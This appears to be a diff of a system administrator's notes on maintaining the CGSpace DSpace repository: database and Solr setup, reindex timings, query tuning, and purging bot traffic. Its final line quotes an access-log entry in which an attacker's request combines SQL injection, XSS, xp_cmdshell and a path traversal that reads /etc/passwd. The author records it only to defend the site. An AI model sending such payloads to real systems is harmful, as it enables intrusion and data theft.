                                                                                                                                                                                                                                                                                                          $ grep -c -E '(Fixing|Removing) (duplicate|excessive|invalid)' /tmp/out.log
                                                                                                                                                                                                                                                                                                          -249
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            $ grep -c -E '(Fixing|Removing) (duplicate|excessive|invalid)' /tmp/out.log
                                                                                                                                                                                                                                                                                                            +249
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            • I ran a full Discovery re-indexing on CGSpace
                                                                                                                                                                                                                                                                                                            • Then I exported all of CGSpace and extracted the ISSNs and ISBNs:
                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                            $ csvcut -c 'id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]' /tmp/cgspace.csv > /tmp/cgspace-issn-isbn.csv
                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                              $ csvcut -c 'id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]' /tmp/cgspace.csv > /tmp/cgspace-issn-isbn.csv
                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                              • I did cleanups on about seventy items with invalid and mixed ISSNs/ISBNs

                                                                                                                                                                                                                                                                                                              2021-10-10

                                                                                                                                                                                                                                                                                                              @@ -417,42 +417,42 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
                                                                                                                                                                                                                                                                                                            • Start testing DSpace 7.1-SNAPSHOT to see if it has the duplicate item bug on metadata-export (DS-4211)
                                                                                                                                                                                                                                                                                                            • First create a new PostgreSQL 13 container:
                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                            $ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5433:5432 -d postgres:13-alpine
                                                                                                                                                                                                                                                                                                            -$ createuser -h localhost -p 5433 -U postgres --pwprompt dspacetest
                                                                                                                                                                                                                                                                                                            -$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
                                                                                                                                                                                                                                                                                                            -$ psql -h localhost -p 5433 -U postgres dspace7 -c 'CREATE EXTENSION pgcrypto;'
                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                              $ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5433:5432 -d postgres:13-alpine
                                                                                                                                                                                                                                                                                                              +$ createuser -h localhost -p 5433 -U postgres --pwprompt dspacetest
                                                                                                                                                                                                                                                                                                              +$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
                                                                                                                                                                                                                                                                                                              +$ psql -h localhost -p 5433 -U postgres dspace7 -c 'CREATE EXTENSION pgcrypto;'
                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                              • Then edit setting in dspace/config/local.cfg and build the backend server with Java 11:
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                              $ mvn package
                                                                                                                                                                                                                                                                                                              -$ cd dspace/target/dspace-installer
                                                                                                                                                                                                                                                                                                              -$ ant fresh_install
                                                                                                                                                                                                                                                                                                              -# fix database not being fully ready, causing Tomcat to fail to start the server application
                                                                                                                                                                                                                                                                                                              -$ ~/dspace7/bin/dspace database migrate
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                $ mvn package
                                                                                                                                                                                                                                                                                                                +$ cd dspace/target/dspace-installer
                                                                                                                                                                                                                                                                                                                +$ ant fresh_install
                                                                                                                                                                                                                                                                                                                +# fix database not being fully ready, causing Tomcat to fail to start the server application
                                                                                                                                                                                                                                                                                                                +$ ~/dspace7/bin/dspace database migrate
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                • Copy Solr configs and start Solr:
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                $ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
                                                                                                                                                                                                                                                                                                                -$ ~/src/solr-8.8.2/bin/solr start
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  $ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
                                                                                                                                                                                                                                                                                                                  +$ ~/src/solr-8.8.2/bin/solr start
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  • Start my local Tomcat 9 instance:
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                  $ systemctl --user start tomcat9@dspace7
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    $ systemctl --user start tomcat9@dspace7
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    • This works, so now I will drop the default database and import a dump from CGSpace
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                    $ systemctl --user stop tomcat9@dspace7                                
                                                                                                                                                                                                                                                                                                                    -$ dropdb -h localhost -p 5433 -U postgres dspace7
                                                                                                                                                                                                                                                                                                                    -$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
                                                                                                                                                                                                                                                                                                                    -$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest superuser;'
                                                                                                                                                                                                                                                                                                                    -$ pg_restore -h localhost -p 5433 -U postgres -d dspace7 -O --role=dspacetest -h localhost dspace-2021-10-09.backup
                                                                                                                                                                                                                                                                                                                    -$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest nosuperuser;'
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      $ systemctl --user stop tomcat9@dspace7                                
                                                                                                                                                                                                                                                                                                                      +$ dropdb -h localhost -p 5433 -U postgres dspace7
                                                                                                                                                                                                                                                                                                                      +$ createdb -h localhost -p 5433 -U postgres -O dspacetest --encoding=UNICODE dspace7
                                                                                                                                                                                                                                                                                                                      +$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest superuser;'
                                                                                                                                                                                                                                                                                                                      +$ pg_restore -h localhost -p 5433 -U postgres -d dspace7 -O --role=dspacetest -h localhost dspace-2021-10-09.backup
                                                                                                                                                                                                                                                                                                                      +$ psql -h localhost -p 5433 -U postgres -c 'alter user dspacetest nosuperuser;'
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      • Delete Atmire migrations and some others that were “unresolved”:
                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                      $ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';"
                                                                                                                                                                                                                                                                                                                      -$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');"
                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                        $ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';"
                                                                                                                                                                                                                                                                                                                        +$ psql -h localhost -p 5433 -U postgres dspace7 -c "DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');"
                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                        • Now DSpace 7 starts with my CGSpace data… nice
                                                                                                                                                                                                                                                                                                                          • The Discovery indexing still takes seven hours… fuck
                                                                                                                                                                                                                                                                                                                          • @@ -469,11 +469,11 @@ $ psql -h localhost -p 5433 -U postgres dspac
                                                                                                                                                                                                                                                                                                                            • Start a full Discovery reindex on my local DSpace 6.3 instance:
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            $ /usr/bin/time -f %M:%e chrt -b 0 ~/dspace63/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                            -Loading @mire database changes for module MQM
                                                                                                                                                                                                                                                                                                                            -Changes have been processed
                                                                                                                                                                                                                                                                                                                            -836140:6543.6
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              $ /usr/bin/time -f %M:%e chrt -b 0 ~/dspace63/bin/dspace index-discovery -b
                                                                                                                                                                                                                                                                                                                              +Loading @mire database changes for module MQM
                                                                                                                                                                                                                                                                                                                              +Changes have been processed
                                                                                                                                                                                                                                                                                                                              +836140:6543.6
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • So that’s 1.8 hours versus 7 on DSpace 7, with the same database!
                                                                                                                                                                                                                                                                                                                              • Several users wrote to me that CGSpace was slow recently
                                                                                                                                                                                                                                                                                                                                  @@ -481,13 +481,13 @@ Changes have been processed
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              $ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                              -53
                                                                                                                                                                                                                                                                                                                              -$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
                                                                                                                                                                                                                                                                                                                              -1697
                                                                                                                                                                                                                                                                                                                              -$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceWeb'" | wc -l
                                                                                                                                                                                                                                                                                                                              -1681
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                $ psql -c 'SELECT * FROM pg_stat_activity' | wc -l
                                                                                                                                                                                                                                                                                                                                +53
                                                                                                                                                                                                                                                                                                                                +$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
                                                                                                                                                                                                                                                                                                                                +1697
                                                                                                                                                                                                                                                                                                                                +$ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name='dspaceWeb'" | wc -l
                                                                                                                                                                                                                                                                                                                                +1681
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • Looking at Munin, I see there are indeed a higher number of locks starting on the morning of 2021-10-07:

                                                                                                                                                                                                                                                                                                                                PostgreSQL locks week

                                                                                                                                                                                                                                                                                                                                @@ -516,71 +516,71 @@ $ psql -c "SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            localhost/dspace= > SET pg_trgm.similarity_threshold = 0.5;
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              localhost/dspace= > SET pg_trgm.similarity_threshold = 0.5;
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • Next I experimented with using GIN or GiST indexes on metadatavalue, but they were slower than the existing DSpace indexes
                                                                                                                                                                                                                                                                                                                                • I tested a few variations of the query I had been using and found it’s much faster if I use the similarity operator and keep the condition that object IDs are in the item table…
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                              -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                              -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                              - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                              -(1 row)
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              -Time: 739.948 ms
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 739.948 ms
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • Now this script runs in four minutes (versus twenty-four!) and it still finds the same seven duplicates! Amazing!
                                                                                                                                                                                                                                                                                                                                • I still don’t understand the differences in the query plan well enough, but I see it is using the DSpace default indexes and the results are accurate
                                                                                                                                                                                                                                                                                                                                • So to summarize, the best to the worst query, all returning the same result:
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                -(1 row)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -Time: 683.165 ms
                                                                                                                                                                                                                                                                                                                                -Time: 635.364 ms
                                                                                                                                                                                                                                                                                                                                -Time: 674.666 ms
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                -(1 row)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -Time: 1584.765 ms (00:01.585)
                                                                                                                                                                                                                                                                                                                                -Time: 1665.594 ms (00:01.666)
                                                                                                                                                                                                                                                                                                                                -Time: 1623.726 ms (00:01.624)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                                                                                                                                                                                                                                                                                                                -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                -(1 row)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -Time: 4028.939 ms (00:04.029)
                                                                                                                                                                                                                                                                                                                                -Time: 4022.239 ms (00:04.022)
                                                                                                                                                                                                                                                                                                                                -Time: 4061.820 ms (00:04.062)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                -localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                                                                                                                                                                                                                                                                                                                -                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                -────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                - Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                -(1 row)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                -Time: 4358.713 ms (00:04.359)
                                                                                                                                                                                                                                                                                                                                -Time: 4301.248 ms (00:04.301)
                                                                                                                                                                                                                                                                                                                                -Time: 4417.909 ms (00:04.418)
                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                2021-10-13

                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 683.165 ms
                                                                                                                                                                                                                                                                                                                                +Time: 635.364 ms
                                                                                                                                                                                                                                                                                                                                +Time: 674.666 ms
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SET pg_trgm.similarity_threshold = 0.6;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % 'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas';
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 1584.765 ms (00:01.585)
                                                                                                                                                                                                                                                                                                                                +Time: 1665.594 ms (00:01.666)
                                                                                                                                                                                                                                                                                                                                +Time: 1623.726 ms (00:01.624)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 4028.939 ms (00:04.029)
                                                                                                                                                                                                                                                                                                                                +Time: 4022.239 ms (00:04.022)
                                                                                                                                                                                                                                                                                                                                +Time: 4061.820 ms (00:04.062)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > DISCARD ALL;
                                                                                                                                                                                                                                                                                                                                +localhost/dspace= > SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Traditional knowledge affects soil management ability of smallholder farmers in marginal areas') > 0.6;
                                                                                                                                                                                                                                                                                                                                +                                           text_value                                           │           dspace_object_id           
                                                                                                                                                                                                                                                                                                                                +────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                                                                + Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
                                                                                                                                                                                                                                                                                                                                +(1 row)
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                +Time: 4358.713 ms (00:04.359)
                                                                                                                                                                                                                                                                                                                                +Time: 4301.248 ms (00:04.301)
                                                                                                                                                                                                                                                                                                                                +Time: 4417.909 ms (00:04.418)
                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                2021-10-13

                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                $ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "booo" -W "(sAMAccountName=fuuu)"
                                                                                                                                                                                                                                                                                                                                -Enter LDAP Password:
                                                                                                                                                                                                                                                                                                                                -ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                -        additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ ldapsearch -x -H ldaps://AZCGNEROOT3.CGIARAD.ORG:636/ -b "dc=cgiarad,dc=org" -D "booo" -W "(sAMAccountName=fuuu)"
                                                                                                                                                                                                                                                                                                                                  +Enter LDAP Password:
                                                                                                                                                                                                                                                                                                                                  +ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                  +        additional info: 80090308: LdapErr: DSID-0C090447, comment: AcceptSecurityContext error, data 52e, v3839
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  • I sent a message to ILRI ICT to ask them to check the account
                                                                                                                                                                                                                                                                                                                                    • They reset the password so I ran all system updates and rebooted the server since users weren’t able to log in anyways
                                                                                                                                                                                                                                                                                                                                    • @@ -664,17 +664,17 @@ ldap_bind: Invalid credentials (49)
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ http 'localhost:8081/solr/statistics/select?q=time%3A2021-04*&fl=ip&wt=json&indent=true&facet=true&facet.field=ip&facet.limit=200000&facet.mincount=1' > /tmp/2021-04-ips.json
                                                                                                                                                                                                                                                                                                                                  -# Ghetto way to extract the IPs using jq, but I can't figure out how only print them and not the facet counts, so I just use sed
                                                                                                                                                                                                                                                                                                                                  -$ jq '.facet_counts.facet_fields.ip[]' /tmp/2021-04-ips.json | grep -E '^"' | sed -e 's/"//g' > /tmp/ips.txt
                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
                                                                                                                                                                                                                                                                                                                                  -$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u > /tmp/networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                  -$ wc -l /tmp/networks-to-block.txt 
                                                                                                                                                                                                                                                                                                                                  -125 /tmp/networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                  -$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt > /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                  -$ wc -l /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                  -202
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    $ http 'localhost:8081/solr/statistics/select?q=time%3A2021-04*&fl=ip&wt=json&indent=true&facet=true&facet.field=ip&facet.limit=200000&facet.mincount=1' > /tmp/2021-04-ips.json
                                                                                                                                                                                                                                                                                                                                    +# Ghetto way to extract the IPs using jq, but I can't figure out how only print them and not the facet counts, so I just use sed
                                                                                                                                                                                                                                                                                                                                    +$ jq '.facet_counts.facet_fields.ip[]' /tmp/2021-04-ips.json | grep -E '^"' | sed -e 's/"//g' > /tmp/ips.txt
                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips.txt -o /tmp/2021-04-ips.csv
                                                                                                                                                                                                                                                                                                                                    +$ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624|8100)$' /tmp/2021-04-ips.csv | csvcut -c network | sed 1d | sort -u > /tmp/networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                    +$ wc -l /tmp/networks-to-block.txt 
                                                                                                                                                                                                                                                                                                                                    +125 /tmp/networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                    +$ grepcidr -f /tmp/networks-to-block.txt /tmp/ips.txt > /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                    +$ wc -l /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                                                    +202
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    • Attempting to purge those only shows about 3,500 hits, but I will do it anyways
                                                                                                                                                                                                                                                                                                                                      • Adding 64.39.108.48 from Qualys I get a total of 22631 hits purged
                                                                                                                                                                                                                                                                                                                                      • @@ -715,9 +715,9 @@ $ wc -l /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                        • Even more annoying, they are not re-using their session ID:
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                        $ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                        -4888
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          $ grep 93.158.91.62 log/dspace.log.2021-10-29 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                          +4888
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          • This IP has made 36,000 requests to CGSpace…
                                                                                                                                                                                                                                                                                                          • The IP is owned by Internet Vikings in Sweden
                                                                                                                                                                                                                                                                                                          • I purged their statistics and set up a temporary HTTP 403 telling them to use a real user agent
                                                                                                                                                                                                                                                                                                          • @@ -729,17 +729,17 @@ $ wc -l /tmp/ips-to-purge.txt
                                                                                                                                                                                                                                                                                                          • I added these two IPs to the nginx IP bot identifier
                                                                                                                                                                                                                                                                                                          • Jesus I found a few Russian IPs attempting SQL injection and path traversal, ie:
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          45.9.20.71 - - [20/Oct/2021:02:31:15 +0200] "GET /bitstream/handle/10568/1820/Rhodesgrass.pdf?sequence=4&OoxD=6591%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23 HTTP/1.1" 200 143070 "https://cgspace.cgiar.org:443/bitstream/handle/10568/1820/Rhodesgrass.pdf" "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11"
                                                                                                                                                                                                                                                                                                          +
